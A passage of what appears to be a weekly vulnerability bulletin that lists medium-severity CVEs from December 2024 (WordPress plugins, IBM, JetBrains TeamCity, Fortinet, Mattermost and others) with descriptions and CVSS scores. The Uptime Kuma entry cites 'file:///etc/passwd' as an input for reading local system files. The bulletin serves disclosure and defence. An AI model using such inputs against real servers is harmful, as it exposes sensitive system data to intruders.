Discourse is an open source platform for community discussion. Users clicking on the lightbox thumbnails could be affected. This problem is patched in the latest version of Discourse. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-12-19 | 6.8 | CVE-2024-52794 |
| discourse--discourse |
Discourse is an open source platform for community discussion. Sites that are using discourse connect but still have local logins enabled could allow attackers to bypass discourse connect to create accounts and login. This problem is patched in the latest version of Discourse. Users unable to upgrade who are using discourse connect may disable all other login methods as a workaround. | 2024-12-19 | 5.3 | CVE-2024-49765 |
| Diversified Technology Corp., WPYog, and Gagan Deep Singh--DTC Documents |
Cross-Site Request Forgery (CSRF) vulnerability in Diversified Technology Corp., WPYog, and Gagan Deep Singh DTC Documents allows Cross Site Request Forgery.This issue affects DTC Documents: from n/a through 1.1.05. | 2024-12-16 | 5.4 | CVE-2024-54418 |
| Dreamfox--Dreamfox Media Payment gateway per Product for Woocommerce |
Missing Authorization vulnerability in Dreamfox Dreamfox Media Payment gateway per Product for Woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Dreamfox Media Payment gateway per Product for Woocommerce: from n/a through 3.5.6. | 2024-12-16 | 6.1 | CVE-2024-55996 |
| dusthazard--Popup Surveys & Polls for WordPress (Mare.io) |
Missing Authorization vulnerability in dusthazard Popup Surveys & Polls for WordPress (Mare.io) allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Popup Surveys & Polls for WordPress (Mare.io): from n/a through 1.36. | 2024-12-16 | 5.4 | CVE-2024-55998 |
| elemntor--Elementor Website Builder More Than Just a Page Builder |
The Elementor Website Builder - More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Typography Settings in all versions up to, and including, 3.25.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-21 | 6.4 | CVE-2024-10453 |
| eLightUp--Falcon WordPress Optimizations & Tweaks |
Missing Authorization vulnerability in eLightUp Falcon - WordPress Optimizations & Tweaks allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Falcon - WordPress Optimizations & Tweaks: from n/a through 2.8.3. | 2024-12-16 | 4.3 | CVE-2024-54384 |
| envoyproxy--envoy |
Envoy is a cloud-native high-performance edge/middle/service proxy. When additional address are not ip addresses, then the Happy Eyeballs sorting algorithm will crash in data plane. This issue has been addressed in releases 1.32.2, 1.31.4, and 1.30.8. Users are advised to upgrade. Users unable to upgrade may disable Happy Eyeballs and/or change the IP configuration. | 2024-12-18 | 4.5 | CVE-2024-53269 |
| fabulatech -- usb_over_network |
A vulnerability classified as problematic has been found in FabulaTech USB over Network 6.0.6.1. Affected is the function 0x22040C in the library ftusbbus2.sys of the component IOCT Handler. The manipulation leads to null pointer dereference. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-16 | 5.5 | CVE-2024-12653 |
| fabulatech -- usb_over_network |
A vulnerability classified as problematic was found in FabulaTech USB over Network 6.0.6.1. Affected by this vulnerability is the function 0x220408 in the library ftusbbus2.sys of the component IOCT Handler. The manipulation leads to null pointer dereference. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-16 | 5.5 | CVE-2024-12654 |
| fabulatech -- usb_over_network |
A vulnerability, which was classified as problematic, has been found in FabulaTech USB over Network 6.0.6.1. Affected by this issue is the function 0x220420 in the library ftusbbus2.sys of the component IOCT Handler. The manipulation leads to null pointer dereference. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-16 | 5.5 | CVE-2024-12655 |
| fabulatech -- usb_over_network |
A vulnerability, which was classified as problematic, was found in FabulaTech USB over Network 6.0.6.1. This affects the function 0x220448 in the library ftusbbus2.sys of the component IOCT Handler. The manipulation leads to null pointer dereference. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-16 | 5.5 | CVE-2024-12656 |
| fahadmahmood--WP Docs |
The WP Docs plugin for WordPress is vulnerable to time-based SQL Injection via the 'dir_id' parameter in all versions up to, and including, 2.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. The vulnerability was partially patched in version 2.2.0. | 2024-12-21 | 6.5 | CVE-2024-12635 |
| feedify--Feedify Web Push Notifications |
The Feedify - Web Push Notifications plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'platform', 'phone', 'email', and 'store_url' parameters. in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-20 | 6.1 | CVE-2024-11811 |
| financecalculatorwp--Financial Calculator |
The Financial Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'finance_calculator' shortcode in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-20 | 6.4 | CVE-2024-11783 |
| Fortinet--FortiClientMac |
A Cleartext Storage of Sensitive Information vulnerability [CWE-312] in FortiClientWindows 7.4.0 through 7.4.1, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13 and FortiClientLinux 7.4.0 through 7.4.2, 7.2.0 through 7.2.7, 7.0.0 through 7.0.13 may permit a local authenticated user to retrieve VPN password via memory dump, due to JavaScript's garbage collector | 2024-12-18 | 5 | CVE-2024-50570 |
| Fortinet--FortiOS |
A heap-based buffer overflow vulnerability in the processing of Link Control Protocol messages in FortiGate versions 5.6.12, 6.0.10, 6.2.4 and 6.4.1 and earlier may allow a remote attacker with valid SSL VPN credentials to crash the SSL VPN daemon by sending a large LCP packet, when tunnel mode is enabled. Arbitrary code execution may be theoretically possible, albeit practically very difficult to achieve in this context | 2024-12-19 | 5.4 | CVE-2020-12819 |
| Fortinet--FortiOS |
Under non-default configuration, a stack-based buffer overflow in FortiOS version 6.0.10 and below, version 5.6.12 and below may allow a remote attacker authenticated to the SSL VPN to crash the FortiClient NAC daemon (fcnacd) and potentially execute arbitrary code via requesting a large FortiClient file name. We are not aware of proof of concept code successfully achieving the latter. | 2024-12-19 | 5.4 | CVE-2020-12820 |
| freeben--Animated Counters |
The Animated Counters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'animatedcounte' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-17 | 6.4 | CVE-2024-11905 |
| gbsdeveloper--Category Post Slider |
The Category Post Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'category-post-slider' shortcode in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-20 | 6.4 | CVE-2024-11878 |
| geoserver--geoserver |
GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. In affected versions the welcome and about page includes version and revision information about the software in use (including library and components used). This information is sensitive from a security point of view because it allows software used by the server to be easily identified. This issue has been patched in version 2.26.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-12-16 | 5.3 | CVE-2024-35230 |
| GitLab--GitLab |
An issue has been discovered in GitLab CE/EE affecting all versions from 16.9 before 17.4.6, 17.5 before 17.5.4, and 17.6 before 17.6.2. By using a specific GraphQL query, under specific conditions an unauthorized user can retrieve branch names. | 2024-12-16 | 5.3 | CVE-2024-8116 |
| GitLab--GitLab |
An issue was discovered in GitLab CE/EE affecting all versions from 15.0 prior to 17.4.6, 17.5 prior to 17.5.4, and 17.6 prior to 17.6.2 that allowed non-member users to view unresolved threads marked as internal notes in public projects merge requests. | 2024-12-16 | 5.3 | CVE-2024-8650 |
| HashiCorp--Nomad |
Nomad Community and Nomad Enterprise ("Nomad") allocations are vulnerable to privilege escalation within a namespace through unredacted workload identity tokens. This vulnerability, identified as CVE-2024-12678, is fixed in Nomad Community Edition 1.9.4 and Nomad Enterprise 1.9.4, 1.8.8, and 1.7.16. | 2024-12-20 | 6.5 | CVE-2024-12678 |
| Hewlett Packard Enterprise (HPE)--HPE Alletra Storage MP B10000 |
Remote authentication bypass vulnerability in HPE Alletra Storage MP B10000 in versions prior to version 10.4.5 could be remotely exploited to allow disclosure of information. | 2024-12-19 | 4 | CVE-2024-54009 |
| holithemes--WP SHAPES |
The WP SHAPES plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2024-12-20 | 6.4 | CVE-2024-9619 |
| HP--HP Linux Imaging and Printing Software |
The HP Linux Imaging and Printing (HPLIP) software may potentially be affected by memory buffer overflow. | 2024-12-19 | 5.7 | CVE-2020-6923 |
| IBM--Cognos Analytics |
IBM Cognos Analytics 11.2.0 through 11.2.4 and 12.0.0 through 12.0.3 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. | 2024-12-18 | 6.8 | CVE-2024-45082 |
| IBM--Cognos Analytics |
IBM Cognos Analytics 11.2.0 through 11.2.4 and 12.0.0 through 12.0.3 is potentially vulnerable to Cross Site Scripting (XSS). A remote attacker could execute malicious commands due to improper validation of column headings in Cognos Explorations. | 2024-12-18 | 5.4 | CVE-2024-25042 |
| IBM--Cognos Analytics |
IBM Cognos Analytics 11.2.0 through 11.2.4 and 12.0.0 through 12.0.3 is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site. | 2024-12-18 | 5.4 | CVE-2024-41752 |
| IBM--Cognos Analytics Mobile for Android |
IBM Cognos Analytics Mobile for Android 1.1.14 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. | 2024-12-19 | 5.9 | CVE-2021-39081 |
| IBM--Db2 for Linux, UNIX and Windows |
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to denial of service with a specially crafted query. | 2024-12-19 | 5.3 | CVE-2023-30443 |
| IBM--i |
IBM i 7.4 and 7.5 is vulnerable to an authenticated user gaining elevated privilege to a physical file. A user with authority to a view can alter the based-on physical file security attributes without having object management rights to the physical file. A malicious actor can use the elevated privileges to perform actions restricted by their view privileges. | 2024-12-18 | 6.8 | CVE-2024-47104 |
| IBM--i |
IBM i 7.3, 7.4, and 7.5 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. | 2024-12-21 | 5.4 | CVE-2024-51463 |
| IBM--i |
IBM i 7.3, 7.4, and 7.5 is vulnerable to bypassing Navigator for i interface restrictions. By sending a specially crafted request, an authenticated attacker could exploit this vulnerability to remotely perform operations that the user is not allowed to perform when using Navigator for i. | 2024-12-21 | 4.3 | CVE-2024-51464 |
| IBM--InfoSphere Information Server |
IBM InfoSphere Information Server 11.7 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim. | 2024-12-19 | 5.2 | CVE-2021-29827 |
| IBM--MQ |
IBM MQ 9.1 LTS, 9.2 LTS, 9.3 LTS, 9.3 CD, 9.4 LTS, 9.4 CD, IBM MQ Appliance 9.3 LTS, 9.3 CD, 9.4 LTS, and IBM MQ for HPE NonStop 8.1.0 through 8.1.0.25 could allow an authenticated user to cause a denial-of-service due to messages with improperly set values. | 2024-12-18 | 6.5 | CVE-2024-51470 |
| IBM--MQ Appliance |
IBM MQ Appliance 9.3 LTS, 9.3 CD, 9.4 LTS, and 9.4 CD web console could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned. | 2024-12-19 | 6.2 | CVE-2024-52896 |
| IBM--MQ Appliance |
IBM MQ Appliance 9.3 LTS, 9.3 CD, and 9.4 LTSÂ web console could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned. | 2024-12-19 | 6.2 | CVE-2024-52897 |
| IBM--MQ Appliance |
IBM MQ Appliance 9.3 LTS, 9.3 CD, and 9.4 LTSÂ web console could allow an authenticated user to cause a denial-of-service when trace is enabled due to information being written into memory outside of the intended buffer size. | 2024-12-19 | 5.3 | CVE-2024-51471 |
| IBM--Robotic Process Automation |
IBM Robotic Process Automation 21.0.1, 21.0.2, and 21.0.3 could allow a user with psychical access to the system to obtain sensitive information due to insufficiently protected credentials. | 2024-12-19 | 4.6 | CVE-2022-33954 |
| IBM--Security Directory Integrator |
IBM Security Directory Integrator 7.2.0 through 7.2.0.13 and 10.0.0 through 10.0.3 could allow a remote authenticated attacker to execute arbitrary commands on the system by sending a specially crafted request. | 2024-12-20 | 6.8 | CVE-2024-28767 |
| IBM--Security Guardium |
IBM Security Guardium 11.5 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. | 2024-12-19 | 6.5 | CVE-2024-49336 |
| IBM--Security Guardium Key Lifecycle Manager |
IBM Security Guardium Key Lifecycle Manager 4.1, 4.1.1, 4.2.0, and 4.2.1Â stores potentially sensitive information in log files that could be read by a local privileged user. | 2024-12-17 | 4.9 | CVE-2024-49816 |
| IBM--Security Guardium Key Lifecycle Manager |
IBM Security Guardium Key Lifecycle Manager 4.1, 4.1.1, 4.2.0, and 4.2.1 stores user credentials in configuration files which can be read by a local privileged user. | 2024-12-17 | 4.4 | CVE-2024-49817 |
| IBM--Security Guardium Key Lifecycle Manager |
IBM Security Guardium Key Lifecycle Manager 4.1, 4.1.1, 4.2.0, and 4.2.1 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. | 2024-12-17 | 4.3 | CVE-2024-49818 |
| IBM--Security Guardium Key Lifecycle Manager |
IBM Security Guardium Key Lifecycle Manager 4.1, 4.1.1, 4.2.0, and 4.2.1Â could allow a remote attacker to obtain sensitive information in cleartext in a communication channel that can be sniffed by unauthorized actors. | 2024-12-17 | 4.1 | CVE-2024-49819 |
| IBM--Sterling B2B Integrator |
IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2024-12-19 | 5.4 | CVE-2021-20553 |
| IBM--Storage Defender - Resiliency Service |
IBM Storage Defender - Resiliency Service 2.0.0 through 2.0.9 does not properly validate a certificate which could allow an attacker to spoof a trusted entity by interfering in the communication path between the host and client. | 2024-12-18 | 5.9 | CVE-2024-47119 |
| IBM--Storage Defender - Resiliency Service |
IBM Storage Defender - Resiliency Service 2.0.0 through 2.0.9 Â stores user credentials in plain text which can be read by an authenticated user with access to the pod. | 2024-12-18 | 5.7 | CVE-2024-52361 |
| IBM--Storage Defender - Resiliency Service |
IBM Storage Defender - Resiliency Service 2.0.0 through 2.0.9 could allow a privileged user to obtain highly sensitive user credentials from secret keys that are stored in clear text. | 2024-12-18 | 4.4 | CVE-2023-50956 |
| ideaboxcreations--PowerPack Lite for Beaver Builder |
The PowerPack Lite for Beaver Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the navigate parameter in all versions up to, and including, 1.3.0.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrative user into performing an action such as clicking on a link. | 2024-12-17 | 6.1 | CVE-2024-12239 |
| Ilja Zaglov | IMBAA GmbH--Responsive Google Maps | by imbaa |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ilja Zaglov | IMBAA GmbH Responsive Google Maps | by imbaa allows Stored XSS.This issue affects Responsive Google Maps | by imbaa: from n/a through 1.2.5. | 2024-12-16 | 6.5 | CVE-2024-56011 |
| Intelbras--VIP S3020 G2 |
A vulnerability was found in Intelbras VIP S3020 G2, VIP S4020 G2, VIP S4020 G3 and VIP S4320 G2 up to 20241222 and classified as problematic. Affected by this issue is some unknown functionality of the file /web_caps/webCapsConfig of the component Web Interface. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor assesses that "the information disclosed in the URL is not sensitive or poses any risk to the user". | 2024-12-22 | 5.3 | CVE-2024-12896 |
| iobit -- advanced_systemcare_ultimate |
A vulnerability has been found in IObit Advanced SystemCare Utimate up to 17.0.0 and classified as problematic. This vulnerability affects the function 0x8001E000 in the library AscRegistryFilter.sys of the component IOCTL Handler. The manipulation leads to null pointer dereference. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-16 | 5.5 | CVE-2024-12657 |
| iobit -- advanced_systemcare_ultimate |
A vulnerability was found in IObit Advanced SystemCare Utimate up to 17.0.0 and classified as problematic. This issue affects the function 0x8001E01C in the library AscRegistryFilter.sys of the component IOCTL Handler. The manipulation leads to null pointer dereference. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-16 | 5.5 | CVE-2024-12658 |
| iobit -- advanced_systemcare_ultimate |
A vulnerability was found in IObit Advanced SystemCare Utimate up to 17.0.0. It has been classified as problematic. Affected is the function 0x8001E004 in the library AscRegistryFilter.sys of the component IOCTL Handler. The manipulation leads to null pointer dereference. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-16 | 5.5 | CVE-2024-12659 |
| iobit -- advanced_systemcare_ultimate |
A vulnerability was found in IObit Advanced SystemCare Utimate up to 17.0.0. It has been declared as problematic. Affected by this vulnerability is the function 0x8001E018 in the library AscRegistryFilter.sys of the component IOCTL Handler. The manipulation leads to null pointer dereference. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-16 | 5.5 | CVE-2024-12660 |
| iobit -- advanced_systemcare_ultimate |
A vulnerability classified as problematic has been found in IObit Advanced SystemCare Utimate up to 17.0.0. This affects the function 0x8001E040 in the library AscRegistryFilter.sys of the component IOCTL Handler. The manipulation leads to null pointer dereference. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-16 | 5.5 | CVE-2024-12662 |
| IObit--Advanced SystemCare Utimate |
A vulnerability was found in IObit Advanced SystemCare Utimate up to 17.0.0. It has been rated as problematic. Affected by this issue is the function 0x8001E024 in the library AscRegistryFilter.sys of the component IOCTL Handler. The manipulation leads to null pointer dereference. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-16 | 5.5 | CVE-2024-12661 |
| iovamihai--Affiliate Program Suite SliceWP Affiliates |
The Affiliate Program Suite - SliceWP Affiliates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.23. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-18 | 6.1 | CVE-2024-12454 |
| itsourcecode--Vehicle Management System |
A vulnerability was found in itsourcecode Vehicle Management System 1.0. It has been classified as critical. Affected is an unknown function of the file editbill.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-19 | 6.3 | CVE-2024-12784 |
| itsourcecode--Vehicle Management System |
A vulnerability was found in itsourcecode Vehicle Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file sendmail.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-19 | 6.3 | CVE-2024-12785 |
| Jake H.--Youtube Video Grid |
Cross-Site Request Forgery (CSRF) vulnerability in Jake H. Youtube Video Grid allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Youtube Video Grid: from n/a through 1.9. | 2024-12-16 | 6.5 | CVE-2024-54408 |
| JetBrains--TeamCity |
In JetBrains TeamCity before 2024.12 access tokens were not revoked after removing user roles | 2024-12-20 | 6.3 | CVE-2024-56351 |
| JetBrains--TeamCity |
In JetBrains TeamCity before 2024.12 improper access control allowed unauthorized users to modify build logs | 2024-12-20 | 5.3 | CVE-2024-56349 |
| JetBrains--TeamCity |
In JetBrains TeamCity before 2024.12 backup file exposed user credentials and session cookies | 2024-12-20 | 5.5 | CVE-2024-56353 |
| JetBrains--TeamCity |
In JetBrains TeamCity before 2024.12 password field value were accessible to users with view settings permission | 2024-12-20 | 5.5 | CVE-2024-56354 |
| JetBrains--TeamCity |
In JetBrains TeamCity before 2024.12 insecure XMLParser configuration could lead to potential XXE attack | 2024-12-20 | 5.9 | CVE-2024-56356 |
| JetBrains--TeamCity |
In JetBrains TeamCity before 2024.12 improper access control allowed viewing details of unauthorized agents | 2024-12-20 | 4.3 | CVE-2024-56348 |
| JetBrains--TeamCity |
In JetBrains TeamCity before 2024.12 build credentials allowed unauthorized viewing of projects | 2024-12-20 | 4.3 | CVE-2024-56350 |
| JetBrains--TeamCity |
In JetBrains TeamCity before 2024.12 stored XSS was possible via image name on the agent details page | 2024-12-20 | 4.6 | CVE-2024-56352 |
| JetBrains--TeamCity |
In JetBrains TeamCity before 2024.12 missing Content-Type header in RemoteBuildLogController response could lead to XSS | 2024-12-20 | 4.6 | CVE-2024-56355 |
| Jozoor--Arabic Webfonts |
Missing Authorization vulnerability in Jozoor Arabic Webfonts allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Arabic Webfonts: from n/a through 1.4.6. | 2024-12-16 | 4.3 | CVE-2024-54402 |
| kanboard--kanboard |
Kanboard is project management software that focuses on the Kanban methodology. In affected versions sessions are still usable even though their lifetime has exceeded. Kanboard implements a cutom session handler (`app/Core/Session/SessionHandler.php`), to store the session data in a database. Therefore, when a `session_id` is given, kanboard queries the data from the `sessions` sql table. At this point, it does not correctly verify, if a given `session_id` has already exceeded its lifetime (`expires_at`). Thus, a session which's lifetime is already `> time()`, is still queried from the database and hence a valid login. The implemented **SessionHandlerInterface::gc** function, that does remove invalid sessions, is called only **with a certain probability** (_Cleans up expired sessions. Called by `session_start()`, based on `session.gc_divisor`, `session.gc_probability` and `session.gc_maxlifetime` settings_) accordingly to the php documentation. In the official Kanboard docker image these values default to: session.gc_probability=1, session.gc_divisor=1000. Thus, an expired session is only terminated with probability 1/1000. This issue has been addressed in release 1.2.43 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-12-19 | 6.5 | CVE-2024-55603 |
| Kioxia--CM6 |
There exists an unauthenticated accessible JTAG port on the Kioxia PM6, PM7 and CM6 devices -Â On the Kioxia CM6, PM6 and PM7 disk drives it was discovered that the 2 main CPU cores of the SoC can be accessed via an open JTAG debug port that is exposed on the drive's circuit board. Due to the wide cutout of the enclosures, the JTAG port can be accessed without having to open the disk enclosure. Utilizing the JTAG debug port, an attacker with (temporary) physical access can get full access to the firmware and memory on the 2 main CPU cores within the drive including the execution of arbitrary code, the modification of firmware execution flow and data or bypassing the firmware signature verification during boot-up. | 2024-12-20 | 6.8 | CVE-2024-7726 |
| Ksher--Ksher |
Missing Authorization vulnerability in Ksher Ksher allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ksher: from n/a through 1.1.1. | 2024-12-16 | 6.5 | CVE-2024-56001 |
| LDAPAccountManager--lam |
LDAP Account Manager (LAM) is a php webfrontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. In affected versions LAM does not properly sanitize configuration values, that are set via `mainmanage.php` and `confmain.php`. This allows setting arbitrary config values and thus effectively bypassing `mitigation` of CVE-2024-23333/GHSA-fm9w-7m7v-wxqv. Configuration values for the main config or server profiles are set via `mainmanage.php` and `confmain.php`. The values are written to `config.cfg` or `serverprofile.conf` in the format of `settingsName: settingsValue` line-by-line. An attacker can smuggle arbitrary config values in a config file, by inserting a newline into certain config fields, followed by the value. This vulnerability has been addressed in version 9.0. All users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-12-17 | 6.5 | CVE-2024-52792 |
| Liferay--Portal |
Cross-site scripting (XSS) vulnerability in the edit Service Access Policy page in Liferay Portal 7.0.0 through 7.4.3.87, and Liferay DXP 7.4 GA through update 87, 7.3 GA through update 29, and older unsupported versions allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a service access policy's `Service Class` text field. | 2024-12-17 | 4.8 | CVE-2023-37940 |
| Llus Corts--Better WP Login Page |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LluÃs Cortès Better WP Login Page allows Stored XSS.This issue affects Better WP Login Page: from n/a through 1.1.2. | 2024-12-16 | 5.9 | CVE-2024-54442 |
| logichunt--Portfolio Filterable Masonry Portfolio Gallery for Professionals |
The Portfolio - Filterable Masonry Portfolio Gallery for Professionals plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'portfolio-pro' shortcode in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-17 | 6.4 | CVE-2024-11900 |
| louislam--uptime-kuma |
Uptime Kuma is an open source, self-hosted monitoring tool. An **Improper URL Handling Vulnerability** allows an attacker to access sensitive local files on the server by exploiting the `file:///` protocol. This vulnerability is triggered via the **"real-browser"** request type, which takes a screenshot of the URL provided by the attacker. By supplying local file paths, such as `file:///etc/passwd`, an attacker can read sensitive data from the server. This vulnerability arises because the system does not properly validate or sanitize the user input for the URL field. Specifically: 1. The URL input (`<input data-v-5f5c86d7="" id="url" type="url" class="form-control" pattern="https?://.+" required="">`) allows users to input arbitrary file paths, including those using the `file:///` protocol, without server-side validation. 2. The server then uses the user-provided URL to make a request, passing it to a browser instance that performs the "real-browser" request, which takes a screenshot of the content at the given URL. If a local file path is entered (e.g., `file:///etc/passwd`), the browser fetches and captures the file's content. Since the user input is not validated, an attacker can manipulate the URL to request local files (e.g., `file:///etc/passwd`), and the system will capture a screenshot of the file's content, potentially exposing sensitive data. Any **authenticated user** who can submit a URL in "real-browser" mode is at risk of exposing sensitive data through screenshots of these files. This issue has been addressed in version 1.23.16 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-12-20 | 6.8 | CVE-2024-56331 |
| madalinungureanu--Paid Membership Subscriptions Effortless Memberships, Recurring Payments & Content Restriction |
The Paid Membership Subscriptions - Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.13.4 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as logged-in users. | 2024-12-18 | 5.3 | CVE-2024-11291 |
| magblogapi--NACC WordPress Plugin |
The NACC WordPress Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'nacc' shortcode in all versions up to, and including, 4.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-20 | 6.4 | CVE-2024-12506 |
| Mansur Ahamed--Ui Slider Filter By Price |
Cross-Site Request Forgery (CSRF) vulnerability in Mansur Ahamed Ui Slider Filter By Price allows Cross Site Request Forgery.This issue affects Ui Slider Filter By Price: from n/a through 1.1. | 2024-12-16 | 5.4 | CVE-2024-54419 |
| mantrabrain--Learning Management System, eLearning, Course Builder, WordPress LMS Plugin Sikshya LMS |
The Learning Management System, eLearning, Course Builder, WordPress LMS Plugin - Sikshya LMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 0.0.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-17 | 6.1 | CVE-2024-12127 |
| Marco Giannini--XML Multilanguage Sitemap Generator |
Missing Authorization vulnerability in Marco Giannini XML Multilanguage Sitemap Generator.This issue affects XML Multilanguage Sitemap Generator: from n/a through 2.0.6. | 2024-12-16 | 5.3 | CVE-2024-55999 |
| Mattermost--Mattermost |
Mattermost versions 10.1.x <= 10.1.2, 10.0.x <= 10.0.2, 9.11.x <= 9.11.4, 9.5.x <= 9.5.12 fail to properly validate the type of callProps which allows a user to cause a client side (webapp and mobile) DoS to users of particular channels, by sending a specially crafted post. | 2024-12-16 | 6.5 | CVE-2024-54083 |
| Mattermost--Mattermost |
Mattermost versions 10.1.x <= 10.1.2, 10.0.x <= 10.0.2, 9.11.x <= 9.11.4, 9.5.x <= 9.5.12 fail to limit the file size for slack import file uploads which allows a user to cause a DoS via zip bomb by importing data in a team they are a team admin. | 2024-12-16 | 6.5 | CVE-2024-54682 |
| Mattermost--Mattermost |
Mattermost Android Mobile Apps versions <=2.21.0 fail to properly configure file providers which allows an attacker with local access to access files via file provider. | 2024-12-16 | 5.7 | CVE-2024-11358 |
| Mattermost--Mattermost |
